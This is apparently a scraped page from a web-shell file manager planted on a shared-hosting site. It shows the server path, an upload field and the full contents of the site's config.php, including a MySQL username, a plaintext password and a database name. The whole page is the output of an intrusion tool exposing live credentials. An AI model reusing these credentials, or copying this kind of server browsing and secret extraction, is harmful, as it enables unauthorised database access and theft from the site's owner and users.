MSV FM

dot.antimicrobial@66.96.161.157: ~ $
Path : /hermes/sb_web/b2432/saktishree15304.ipage.com/user/include/
File Upload :
Current < : /hermes/sb_web/b2432/saktishree15304.ipage.com/user/include/config.php

<?php
	$hostname ="localhost";
	$username ="itsmypro_ai";
	$password ="Pulsar@123";
	$databasename ="itsmypro_dp";
	$prefix = "air_";
    $con = mysqli_connect($hostname,$username,$password,$databasename);
    if (!$con)
    {
        echo mysqli_connect_error();
        die();
    }
?>